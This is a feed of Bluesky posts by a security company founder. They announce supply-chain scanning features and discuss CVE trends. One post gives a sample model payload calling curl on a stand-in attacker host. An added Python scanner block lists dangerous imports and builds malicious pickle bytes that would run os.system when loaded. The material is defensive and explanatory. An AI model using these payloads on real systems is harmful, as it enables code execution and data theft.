Feross
feross.bsky.social
🧙‍♂️ Mad scientist • ✨ Founder + CEO @Socket.dev (http://socket.dev) •🌲 Stanford lecturer (http://cs253.stanford.edu) • ❤️ Open source at WebTorrent + StandardJS
The November bar stands out. It’s down sharply compared to November 2024.

The visual makes the dip feel dramatic, but this isn’t a signal of lower risk. It’s a signal of slower publishing by a few major CNAs.
December 5, 2025 at 9:12 PM
CVE volume is ahead of last year, even with a small dip in November.

42,697 CVEs through Nov 30, running 16.9 percent higher than 2024.

The chart makes it obvious how steady the upward curve has been all year. The overall trend is sustained growth in disclosures.
December 5, 2025 at 9:12 PM
Webhooks for Alert Changes just dropped 🎉

No more refreshing dashboards. Socket now pushes every new, updated, or cleared alert straight into your workflow in real time.

Perfect way to wrap Launch Week: Ruby reachability, Certified Patches, Bun/vlt, OpenVSX… and now this ⚡️
November 22, 2025 at 12:33 AM
IDE extensions are a silent nightmare.

VS Code extensions get full access to your code and creds, and attackers have already slipped malware into VS Code Marketplace and OpenVSX.

So Socket now scans OpenVSX extensions before they ever hit your machine. 🔍⚡️
November 20, 2025 at 5:39 PM
🚀 Big news for JavaScript teams: Socket now supports Bun and vlt in beta.

You no longer have to choose between innovation and security. Commit a bun.lock or vlt-lock.json and Socket gives you full supply chain protection.
November 19, 2025 at 5:21 PM
🚀 Day Two of Socket Launch Week!

We’re launching @socket.dev Certified Patches—a new way to eliminate vulnerabilities instantly without upgrading your package versions or pulling in risky new code.

Tiny, human-reviewed fixes that give teams a clean path to zero exploitable CVEs.
November 18, 2025 at 8:03 PM
1/ Ruby teams, this one’s for you 🔥

Today we’re launching Reachability for Ruby in beta. It identifies which Ruby vulnerabilities are actually exploitable in your app… and which ones are just noise.
November 17, 2025 at 6:24 PM
Today, we’re launching Socket Firewall Enterprise — built to stop malicious packages before they ever reach your apps or developer systems.
October 24, 2025 at 3:56 PM
You’d never clone a random repo and give it your production keys… But that’s literally what your GitHub Actions do every time they run.

Think about it — your GitHub Actions pipeline pulls in random code straight from the internet, runs it with full access to secrets, tokens, everything.
October 23, 2025 at 8:24 PM
1️⃣ Static analysis (SAST) for 14 languages — finds real code issues like command injection or unsafe deserialization before they land.

2️⃣ Secrets detection — catches leaked API keys before they’re merged.

3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
October 21, 2025 at 7:00 PM
4️⃣
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...

Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
October 20, 2025 at 4:21 PM
3️⃣
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.

That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.

We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
October 20, 2025 at 4:21 PM
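The post above notes that Pickle-based model files can execute code when loaded. As an added example (not Socket's scanner or any code from the original thread), the following walks a pickle's opcode stream with the standard library's pickletools, without ever unpickling, and flags imports such as os.system that a legitimate checkpoint never needs. The sample byte strings are constructed here for illustration and are not real model files; the suspicious-import list is an illustrative assumption, not a complete one.

```python
import pickle
import pickletools
from typing import List

# Import targets a legitimate model checkpoint never needs to resolve;
# a pickle that references any of them runs code at load time.
# (Illustrative list, not exhaustive.)
SUSPICIOUS_IMPORTS = {
    ("os", "system"), ("posix", "system"), ("nt", "system"),
    ("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "call"),
    ("builtins", "eval"), ("builtins", "exec"), ("builtins", "__import__"),
    ("socket", "socket"), ("shutil", "rmtree"),
}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

def scan_pickle(data: bytes) -> List[str]:
    """Walk the opcode stream with pickletools (never calls pickle.loads)
    and return one finding per suspicious import the file would perform."""
    findings = []
    strings = []  # recent string constants, needed to resolve STACK_GLOBAL
    for op, arg, pos in pickletools.genops(data):
        module = name = None
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name == "GLOBAL":            # protocols 0-3: arg is "module name"
            module, name = arg.split(" ", 1)
        elif op.name == "STACK_GLOBAL":      # protocol 4+: pops two strings
            if len(strings) >= 2:
                module, name = strings[-2], strings[-1]
                del strings[-2:]
        if module is not None and (module, name) in SUSPICIOUS_IMPORTS:
            findings.append(f"offset {pos}: imports {module}.{name} (runs at load)")
    return findings

def is_safe_to_load(data: bytes) -> bool:
    return not scan_pickle(data)

# Constructed samples (not real model files).
BENIGN = pickle.dumps({"layers": 2, "weights": [0.1, 0.2]}, protocol=4)
# Protocol-0 pickle that would call os.system("echo ...") on load; never loaded here.
MALICIOUS_P0 = b"cos\nsystem\n(S'echo constructed sample'\ntR."
# Same behaviour encoded with protocol-4 opcodes (STACK_GLOBAL instead of GLOBAL).
MALICIOUS_P4 = b"\x80\x04\x8c\x02os\x8c\x06system\x93\x8c\x04echo\x85R."

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN), ("p0", MALICIOUS_P0), ("p4", MALICIOUS_P4)]:
        print(label, scan_pickle(blob) or "clean")
```

The STACK_GLOBAL resolution only tracks plain string constants, so a pickle that builds the module name through memo references would need a fuller stack emulation; treat a clean result as "no known-bad import found", not as proof the file is safe.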
2️⃣
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors

If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
October 20, 2025 at 4:21 PM
🚨 Open source supply chain attacks are exploding.

Starting today, that ends.

We’re releasing Socket Firewall — FREE, zero-config, CLI that blocks malware before it lands on your laptop or CI.

Just run:

npm i -g sfw
sfw npm install lodash

Works for: npm, yarn, pnpm, pip, uv, and cargo.
September 30, 2025 at 6:06 PM
DJ Khaled on compromised NPM packages
September 18, 2025 at 2:51 PM
3️⃣ It’s all live in the UI 🖱️ and the API 🧪

So whether you’re a clicker or a scripter 🧑‍💻 — you’re covered.

This is a public beta 🚧 Available NOW ⏰

Tell us what you love — and what’s broken 🛠️
April 22, 2025 at 7:15 PM
1️⃣ You can now tag your repos with custom labels:

• frontend 🎨
• infra ⚙️
• legacy 🪦
• team-red 🟥

Whatever fits your mental model 🧠.

Finally, a sane way to bring order to repo chaos.
April 22, 2025 at 7:15 PM